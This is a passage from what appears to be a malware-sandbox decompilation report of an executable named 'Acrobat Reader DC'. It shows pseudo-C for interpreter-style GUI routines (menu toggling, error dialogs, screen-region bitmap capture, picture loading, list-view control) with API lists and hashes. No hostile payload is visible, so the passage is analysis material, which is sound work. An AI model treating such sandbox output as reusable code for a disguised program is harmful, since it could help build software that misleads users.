                                  								if((_v68.fState & 0x00000008) == 0) {
                                  									_t18 =  &(_v68.fState);
                                  									 *_t18 = _v68.fState | 0x00000008;
                                  									__eflags =  *_t18;
                                  									 *0x4974ec = 1;
                                  								} else {
                                  									_v68.fState = _v68.fState ^ 0x00000008;
                                  									 *0x4974ec = 0;
                                  								}
                                  								SetMenuItemInfoW( *_t120, 4, 0,  &_v68);
                                  								E00401B80(_t120, _t126);
                                  								Sleep(0x1f4);
                                  								return 1;
                                  							}
                                  						}
                                  					} else {
                                  						 *0x4974f0 = 2;
                                  						 *0x4974e6 = 1;
                                  						return 1;
                                  					}
                                  				}
                                  			}


























                                  APIs
                                  • _memset.LIBCMT ref: 0045FD75
                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                  • SetMenuItemInfoW.USER32 ref: 0045FE14
                                  • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InfoItemMenu$Sleep_memset
                                  • String ID: 0
                                  • API String ID: 1504565804-4108050209
                                  • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                  • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                  • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                  • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E00460879(WCHAR* __edx, void* __fp0, intOrPtr _a4, int _a8, intOrPtr _a12) {
                                  				WCHAR* _v24;
                                  				intOrPtr _v28;
                                  				void* _v44;
                                  				char _v60;
                                  				WCHAR* _v76;
                                  				short _v8272;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t38;
                                  				intOrPtr _t48;
                                  				intOrPtr _t82;
                                  				int _t83;
                                  				int _t85;
                                  				WCHAR* _t96;
                                  				intOrPtr _t108;
                                  				void* _t117;
                                  
                                  				_t117 = __fp0;
                                  				_t93 = __edx;
                                  				_t38 = E00422240(0x2050);
                                  				_t82 = _a4;
                                  				_t112 = _t82;
                                  				if(_t82 > 0) {
                                  					_t85 =  *0x4a9130; // 0x66
                                  					LoadStringW(GetModuleHandleW(0), _t85,  &_v8272, 0xfff);
                                  					_t96 =  &_v8272;
                                  					E00401B10(_t96,  &_v76, _t112);
                                  					LoadStringW(GetModuleHandleW(0), _a8, _t96, 0xfff);
                                  					E00401B10(_t96,  &_v60, _t112);
                                  					_a4 = E004348DE(_t82);
                                  					_t48 = E004348AA(_t82);
                                  					_t106 = _t48;
                                  					_v28 = _t48;
                                  					_t83 = E00434908(E0043492F(_t82));
                                  					_a8 = _t83;
                                  					_t113 = _t83;
                                  					if(_t83 != 0) {
                                  						_push(_t83);
                                  						_t93 =  &_v8272;
                                  						E0041329B( &_v8272,  &_v8272, L"Line %d  (File \"%s\"):\n\n", _t106);
                                  					} else {
                                  						E0041329B(_t93, _t96, L"Line %d:\n\n", _t106);
                                  					}
                                  					E00401B10( &_v8272,  &_v24, _t113);
                                  					_t108 = _a4;
                                  					E0040D200( &_v24, _t85, _t108, _t117);
                                  					E0040D200( &_v24, _t85, "\n", _t117);
                                  					_t86 =  &_v44;
                                  					E0040BC70( &_v44, _t113);
                                  					_t100 = _a12;
                                  					if(_a12 >= 0) {
                                  						E00402160( &_v44, _t108, _t93, _t100);
                                  						E0040C600( &_v44 | 0xffffffff,  &_v44, _t100);
                                  						E0040D200( &_v44,  &_v44, L"^ ERROR", _t117);
                                  						_t86 =  &_v44;
                                  						E0040BD50( &_v24, _t117,  &_v44);
                                  						E0040D200( &_v24,  &_v44, "\n", _t117);
                                  						_t83 = _a8;
                                  					}
                                  					E0040D200( &_v24, _t86, L"\nError: ", _t117);
                                  					E0040BD50( &_v24, _t117,  &_v60);
                                  					_t116 =  *0x4a90eb;
                                  					if( *0x4a90eb == 0) {
                                  						MessageBoxW(0, _v24, _v76, 0x11010);
                                  					} else {
                                  						_push(_v44);
                                  						_push(_t108);
                                  						_push(_v60);
                                  						_push(_v28);
                                  						_push(_t83);
                                  						_push(L"%s (%d) : ==> %s: \n%s \n%s\n");
                                  						E00413ABE(_t83, _v28, L"\nError: ", _t108, _t116);
                                  					}
                                  					E00402250( &_v44);
                                  					E00402250( &_v24);
                                  					E00402250( &_v60);
                                  					return E00402250( &_v76);
                                  				}
                                  				return _t38;
                                  			}

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                  • __swprintf.LIBCMT ref: 00460915
                                  • __swprintf.LIBCMT ref: 0046092D
                                  • _wprintf.LIBCMT ref: 004609E1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                  Strings
                                  Similarity
                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                  • API String ID: 3631882475-2268648507
                                  • Opcode ID: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                  • Opcode Fuzzy Hash: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E004313CA(int _a4, int _a8, void* _a12, char _a15, intOrPtr* _a16) {
                                  				char _v5;
                                  				struct HBITMAP__* _v12;
                                  				struct HDC__* _v16;
                                  				void* _v20;
                                  				intOrPtr _v24;
                                  				char _v28;
                                  				intOrPtr _v52;
                                  				struct HWND__* _v56;
                                  				intOrPtr _v60;
                                  				signed int _v64;
                                  				int _v68;
                                  				struct tagBITMAPINFO _v72;
                                  				void* __edi;
                                  				void* __esi;
                                  				int _t60;
                                  				intOrPtr _t64;
                                  				void* _t71;
                                  				int _t72;
                                  				intOrPtr _t77;
                                  				void* _t78;
                                  				int _t79;
                                  				int _t91;
                                  				int _t94;
                                  				intOrPtr _t96;
                                  				int _t98;
                                  				int _t105;
                                  				intOrPtr _t108;
                                  				int _t109;
                                  				int _t114;
                                  				struct HDC__* _t115;
                                  				struct HDC__* _t116;
                                  				int* _t119;
                                  				int _t120;
                                  				void* _t121;
                                  
                                  				_t119 = _a12;
                                  				_t60 = _t119[2];
                                  				_t94 =  *_t119;
                                  				_t105 = _t119[1];
                                  				_t114 = _t119[3];
                                  				_a15 = _t60 - _t94 < 0;
                                  				_v5 = _t114 - _t105 < 0;
                                  				if(_a15 != 0) {
                                  					 *_t119 = _t60;
                                  					_t119[2] = _t94;
                                  				}
                                  				if(_v5 != 0) {
                                  					_t119[1] = _t114;
                                  					_t119[3] = _t105;
                                  				}
                                  				E0043137E( *((intOrPtr*)(_a4 + 0x104)),  &_v28, _a8);
                                  				_t64 = _v28;
                                  				 *_t119 =  *_t119 + _t64;
                                  				_t119[2] = _t119[2] + _t64;
                                  				_t96 = _v24;
                                  				_t119[3] = _t119[3] + _t96;
                                  				_t119[1] = _t119[1] + _t96;
                                  				_a8 = _t119[2] -  *_t119 + 1;
                                  				_t91 = _t119[3] - _t119[1] + 1;
                                  				_t115 = GetDC(0);
                                  				_v16 = _t115;
                                  				_v12 = CreateCompatibleBitmap(_t115, _a8, _t91);
                                  				_t116 = CreateCompatibleDC(_t115);
                                  				_t71 = SelectObject(_t116, _v12);
                                  				_t108 = _v5;
                                  				_v20 = _t71;
                                  				_t98 = _t91;
                                  				if(_t108 != 0) {
                                  					_t98 =  ~_t98;
                                  				}
                                  				_t72 = _a8;
                                  				if(_a15 != 0) {
                                  					_t72 =  ~_t72;
                                  				}
                                  				if(_t108 == 0) {
                                  					_t109 = _t119[1];
                                  				} else {
                                  					_t109 = _t119[3];
                                  				}
                                  				_t132 = _a15;
                                  				_a4 = _t109;
                                  				if(_a15 == 0) {
                                  					_t120 =  *_t119;
                                  				} else {
                                  					_t120 = _t119[2];
                                  				}
                                  				StretchBlt(_t116, 0, 0, _a8, _t91, _v16, _t120, _a4, _t72, _t98, 0xcc0020);
                                  				_t121 = _v12;
                                  				_v64 =  ~_t91;
                                  				_v72.bmiHeader = 0x28;
                                  				_v68 = _a8;
                                  				_v60 = 0x200001;
                                  				_v56 = 0;
                                  				GetDIBits(_t116, _t121, 0, 0, 0,  &_v72, 0);
                                  				_t77 = _v52;
                                  				_push(_t77);
                                  				 *_a16 = _t77;
                                  				_t78 = E004115D7(_t116, _t121, _t132);
                                  				_a12 = _t78;
                                  				_t79 = GetDIBits(_t116, _t121, 0, _t91, _t78,  &_v72, 0);
                                  				SelectObject(_t116, _v20);
                                  				DeleteObject(_t121);
                                  				DeleteDC(_t116);
                                  				ReleaseDC(0, _v16);
                                  				if(_t79 == 0) {
                                  					_push(_a12);
                                  					E004111DC();
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					return _a12;
                                  				}
                                  			}

                                  APIs
                                  • GetDC.USER32(00000000), ref: 0043143E
                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                  • SelectObject.GDI32(00000000,?), ref: 00431466
                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                  • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                  Strings
                                  Similarity
                                  • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                  • String ID: (
                                  • API String ID: 3300687185-3887548279
                                  • Opcode ID: 606d77b4f1bde06d9a9935c8edd261f35aeb593e5eea415e727307547a522621
                                  • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                  • Opcode Fuzzy Hash: 606d77b4f1bde06d9a9935c8edd261f35aeb593e5eea415e727307547a522621
                                  • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00432A10(void* __ecx, short* _a4, struct _SYSTEMTIME* _a8, char _a12, signed int _a16) {
                                  				short _v8;
                                  				short _v12;
                                  				char _v16;
                                  				void* _t43;
                                  				WORD _t48;
                                  				WORD _t52;
                                  				short _t60;
                                  				void* _t61;
                                  				WORD _t64;
                                  				void* _t65;
                                  				WORD _t68;
                                  				void* _t69;
                                  				signed int _t70;
                                  				void* _t71;
                                  				struct _SYSTEMTIME* _t85;
                                  				short* _t86;
                                  				void* _t87;
                                  				void* _t89;
                                  				void* _t90;
                                  
                                  				_t70 = _a16;
                                  				_t86 = _a4;
                                  				_t85 = _a8;
                                  				GetLocalTime(_t85);
                                  				if( *_t86 == 0) {
                                  					L12:
                                  					return 0;
                                  				} else {
                                  					_t43 = E004111C1(_t86);
                                  					_t90 = _t89 + 4;
                                  					if(_t43 < 4) {
                                  						goto L12;
                                  					} else {
                                  						if(_a12 != 0) {
                                  							E00412FBA( &_v16, _t86, 4);
                                  							_push( &_v16);
                                  							_v8 = 0;
                                  							_t60 = E00413190();
                                  							_t86 = _t86 + 8 + _t70 * 2;
                                  							_t85->wYear = _t60;
                                  							_t61 = E004111C1(_t86);
                                  							_t90 = _t90 + 0x14;
                                  							if(_t61 >= 2) {
                                  								E00412FBA( &_v16, _t86, 2);
                                  								_push( &_v16);
                                  								_v12 = 0;
                                  								_t64 = E00413190();
                                  								_t86 = _t86 + 4 + _t70 * 2;
                                  								_t85->wMonth = _t64;
                                  								_t65 = E004111C1(_t86);
                                  								_t90 = _t90 + 0x14;
                                  								if(_t65 >= 2) {
                                  									E00412FBA( &_v16, _t86, 2);
                                  									_push( &_v16);
                                  									_v12 = 0;
                                  									_t68 = E00413190();
                                  									_t86 = _t86 + 4;
                                  									_t85->wDay = _t68;
                                  									_t69 = E004111C1(_t86);
                                  									_t90 = _t90 + 0x14;
                                  									if(_t69 != 0) {
                                  										_t86 = _t86 + _t70 * 2;
                                  									}
                                  								}
                                  							}
                                  						}
                                  						if(E004111C1(_t86) >= 2) {
                                  							E00412FBA( &_v16, _t86, 2);
                                  							_push( &_v16);
                                  							_v12 = 0;
                                  							_t48 = E00413190();
                                  							_t87 = _t86 + 4 + _t70 * 2;
                                  							_t85->wHour = _t48;
                                  							_t71 = _t70 + _t70 + 4;
                                  							if(E004111C1(_t87) >= 2) {
                                  								E00412FBA( &_v16, _t87, 2);
                                  								_push( &_v16);
                                  								_v12 = 0;
                                  								_t52 = E00413190();
                                  								_t88 = _t87 + _t71;
                                  								_t85->wMinute = _t52;
                                  								if(E004111C1(_t87 + _t71) >= 2) {
                                  									E00412FBA( &_v16, _t88, 2);
                                  									_push( &_v16);
                                  									_v12 = 0;
                                  									_t85->wSecond = E00413190();
                                  									_t85->wMilliseconds = 0;
                                  								}
                                  							}
                                  						}
                                  						return 1;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                  • String ID:
                                  • API String ID: 461458858-0
                                  • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                  • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0043009D(struct HWND__** _a4, void* _a8, int* _a12, int* _a16) {
                                  				int _v8;
                                  				void* _v12;
                                  				long _v16;
                                  				int _v32;
                                  				int _v36;
                                  				void _v40;
                                  				WCHAR* _t27;
                                  				void* _t28;
                                  				long _t29;
                                  				intOrPtr* _t42;
                                  				intOrPtr* _t46;
                                  				int* _t50;
                                  				int _t53;
                                  				long _t57;
                                  				int* _t63;
                                  				void* _t76;
                                  				struct HWND__** _t79;
                                  				struct HWND__* _t80;
                                  				void* _t82;
                                  
                                  				_t27 = _a8;
                                  				if( *_t27 == 0) {
                                  					_a8 = 0;
                                  					goto L10;
                                  				} else {
                                  					_t76 = CreateFileW(_t27, 0x80000000, 0, 0, 3, 0, 0);
                                  					if(_t76 != 0xffffffff) {
                                  						_t57 = GetFileSize(_t76, 0);
                                  						_t82 = GlobalAlloc(2, _t57);
                                  						if(_t82 == 0) {
                                  							goto L2;
                                  						} else {
                                  							ReadFile(_t76, GlobalLock(_t82), _t57,  &_v16, 0);
                                  							GlobalUnlock(_t82);
                                  							CloseHandle(_t76);
                                  							__imp__CreateStreamOnHGlobal(_t82, 1,  &_v12);
                                  							_v8 = 0;
                                  							__imp__#418(_v12, 0, 0, 0x4829f8,  &_v8);
                                  							_t42 = _v12;
                                  							 *((intOrPtr*)( *((intOrPtr*)( *_t42 + 8))))(_t42);
                                  							GlobalFree(_t82);
                                  							_t46 = _v8;
                                  							if(_t46 == 0) {
                                  								goto L2;
                                  							} else {
                                  								 *((intOrPtr*)( *((intOrPtr*)( *_t46 + 0xc))))(_t46,  &_a8);
                                  								GetObjectW(_a8, 0x18,  &_v40);
                                  								_t63 = _a12;
                                  								_t50 = _a16;
                                  								if( *_t63 == 0 &&  *_t50 == 0) {
                                  									 *_t63 = _v36;
                                  									 *_t50 = _v32;
                                  								}
                                  								_a8 = CopyImage(_a8, 0,  *_t63,  *_t50, 0x2000);
                                  								_t53 = _v8;
                                  								 *((intOrPtr*)( *((intOrPtr*)( *_t53 + 8))))(_t53);
                                  								L10:
                                  								_t79 = _a4;
                                  								_t28 = _t79[0x18];
                                  								if(_t28 != 0) {
                                  									DeleteObject(_t28);
                                  								}
                                  								_t29 = _a8;
                                  								_t79[0x18] = _t29;
                                  								_t80 =  *_t79;
                                  								SendMessageW(_t80, 0x172, 0, _t29);
                                  								return _t80;
                                  							}
                                  						}
                                  					} else {
                                  						L2:
                                  						return 0;
                                  					}
                                  				}
                                  			}























                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                  • GlobalLock.KERNEL32 ref: 004300F6
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                  • GlobalFree.KERNEL32 ref: 00430150
                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                  • CopyImage.USER32 ref: 004301A8
                                  • DeleteObject.GDI32(?), ref: 004301D0
                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                  • String ID:
                                  • API String ID: 3969911579-0
                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E00445BE4(void* __eflags, struct HWND__** _a4, intOrPtr* _a8) {
                                  				short _v520;
                                  				void* __edi;
                                  				void* _t12;
                                  				void* _t14;
                                  				void* _t16;
                                  				void* _t17;
                                  				struct HWND__* _t23;
                                  				intOrPtr* _t27;
                                  
                                  				_t27 = _a8;
                                  				_t23 = GetParent( *_a4);
                                  				GetClassNameW(_t23,  &_v520, 0x100);
                                  				if(E0041313C( &_v520, L"SHELLDLL_DefView") != 0) {
                                  					return 0;
                                  				} else {
                                  					_t12 = E004114AB(_t23,  *_t27, L"largeicons");
                                  					if(_t12 != 0) {
                                  						_t14 = E004114AB(_t23,  *_t27, L"details");
                                  						if(_t14 != 0) {
                                  							_t16 = E004114AB(_t23,  *_t27, L"smallicons");
                                  							if(_t16 != 0) {
                                  								_t17 = E004114AB(_t23,  *_t27, L"list");
                                  								if(_t17 == 0) {
                                  									_push(_t17);
                                  									_push(0x702b);
                                  									goto L10;
                                  								}
                                  							} else {
                                  								_push(_t16);
                                  								_push(0x702a);
                                  								goto L10;
                                  							}
                                  						} else {
                                  							_push(_t14);
                                  							_push(0x702c);
                                  							goto L10;
                                  						}
                                  					} else {
                                  						_push(_t12);
                                  						_push(0x7029);
                                  						L10:
                                  						SendMessageW(_t23, 0x111, ??, ??);
                                  					}
                                  					return 1;
                                  				}
                                  			}












                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$ClassMessageNameParentSend
                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                  • API String ID: 3125838495-3381328864
                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E004491B9(void* __eflags, void* __fp0, WCHAR* _a4, signed int _a6, signed int _a8, long _a12) {
                                  				int _v12;
                                  				int _v16;
                                  				int _v20;
                                  				int _v24;
                                  				signed int _v28;
                                  				int _v32;
                                  				long _v52;
                                  				long _v64;
                                  				long _v68;
                                  				int _v72;
                                  				char _v88;
                                  				WCHAR* _v108;
                                  				void* _v120;
                                  				struct tagMENUITEMINFOW _v168;
                                  				WCHAR* _v184;
                                  				void* _v192;
                                  				long _v208;
                                  				void* _v220;
                                  				long _v244;
                                  				long _v256;
                                  				int _v260;
                                  				void* _v8456;
                                  				signed int _t138;
                                  				struct HWND__** _t159;
                                  				intOrPtr _t161;
                                  				intOrPtr _t168;
                                  				long _t169;
                                  				struct HWND__* _t175;
                                  				WCHAR* _t176;
                                  
                                  				E00422240(0x2108);
                                  				_t176 = _a8;
                                  				_v24 = 0;
                                  				_v16 = 0;
                                  				_v12 = 0;
                                  				_v20 = 0;
                                  				if(E00441AF5(0x4a8630, _a4,  &_a8,  &_v28) == 0) {
                                  					L13:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_t161 =  *0x4a8690; // 0x0
                                  					_t168 =  *0x4a86a4; // 0xa71980
                                  					_t159 =  *( *(_t168 + _v28 * 4));
                                  					_t138 = _t159[0x22] & 0x000000ff;
                                  					_t175 =  *_t159;
                                  					_a8 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + _a8 * 4))));
                                  					if(_t138 > 3) {
                                  						_t169 = _a12;
                                  						__eflags = _t169;
                                  						if(__eflags == 0) {
                                  							goto L7;
                                  						} else {
                                  							__eflags =  *_t169;
                                  							if(__eflags != 0) {
                                  								goto L13;
                                  							} else {
                                  								goto L7;
                                  							}
                                  						}
                                  					} else {
                                  						switch( *((intOrPtr*)(_t138 * 4 +  &M004497C5))) {
                                  							case 0:
                                  								_v24 = 0x143;
                                  								_v16 = 0x158;
                                  								_v12 = 0x14e;
                                  								_v20 = 0x14b;
                                  								goto L7;
                                  							case 1:
                                  								_v24 = 0x180;
                                  								_v16 = 0x1a2;
                                  								_v12 = 0x186;
                                  								_v20 = 0x184;
                                  								goto L7;
                                  							case 2:
                                  								L7:
                                  								if(_t138 > 0x1c) {
                                  									L66:
                                  									__eflags = _t176;
                                  									if(_t176 == 0) {
                                  										goto L10;
                                  									} else {
                                  										_t140 = SetWindowTextW(_t175, _t176);
                                  										__eflags = _t140;
                                  										if(_t140 == 0) {
                                  											goto L13;
                                  										} else {
                                  											E00430B87(_a8, _t159, 1);
                                  											goto L69;
                                  										}
                                  									}
                                  								} else {
                                  									switch( *((intOrPtr*)(( *(_t138 + 0x44980d) & 0x000000ff) * 4 +  &M004497D5))) {
                                  										case 0:
                                  											if(_t176 != 0) {
                                  												_t144 = SendMessageW(_t175, _v16, 0xffffffff, _t176);
                                  												__eflags = _t144 - 0xffffffff;
                                  												if(_t144 == 0xffffffff) {
                                  													_t145 =  *_t176 & 0x0000ffff;
                                  													_a4 = _t176;
                                  													__eflags = _t145 -  *0x4a8644; // 0x7c
                                  													if(__eflags == 0) {
                                  														L16:
                                  														_a4 = CharNextW(_t176);
                                  														SendMessageW(_t175, _v20, 0, 0);
                                  													} else {
                                  														__eflags = _t145;
                                  														if(__eflags != 0) {
                                  															while(1) {
                                  																L18:
                                  																__eflags = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
                                  																if(__eflags == 0) {
                                  																	break;
                                  																}
                                  																SendMessageW(_t175, _v24, 0,  &_v8456);
                                  															}
                                  															_t150 = _a12;
                                  															__eflags = _t150;
                                  															if(_t150 == 0) {
                                  																goto L69;
                                  															} else {
                                  																_t151 = SendMessageW(_t175, _v16, 0xffffffff, _t150);
                                  																__eflags = _t151 - 0xffffffff;
                                  																if(_t151 == 0xffffffff) {
                                  																	goto L69;
                                  																} else {
                                  																	SendMessageW(_t175, _v12, _t151, 0);
                                  																	return 1;
                                  																}
                                  															}
                                  															goto L70;
                                  														} else {
                                  															goto L16;
                                  														}
                                  													}
                                  													goto L18;
                                  												} else {
                                  													SendMessageW(_t175, _v12, _t144, 0);
                                  													E00430B87(_a8, _t159, 1);
                                  													goto L13;
                                  												}
                                  											} else {
                                  												goto L10;
                                  											}
                                  											goto L70;
                                  										case 1:
                                  											__eax = _a12;
                                  											__eflags = __eax;
                                  											if(__eax == 0) {
                                  												L29:
                                  												SetWindowTextW(__edi, __esi) = SendMessageW(__edi, 0xb1, 0xf4240, 0xf423f);
                                  												_a8[0x72] = 0xffffffff;
                                  												__eax = 1;
                                  												return 1;
                                  											} else {
                                  												__eflags =  *__eax;
                                  												if( *__eax == 0) {
                                  													goto L29;
                                  												} else {
                                  													SendMessageW(__edi, 0xc2, 1, __esi) = 1;
                                  													return 1;
                                  												}
                                  											}
                                  											goto L70;
                                  										case 2:
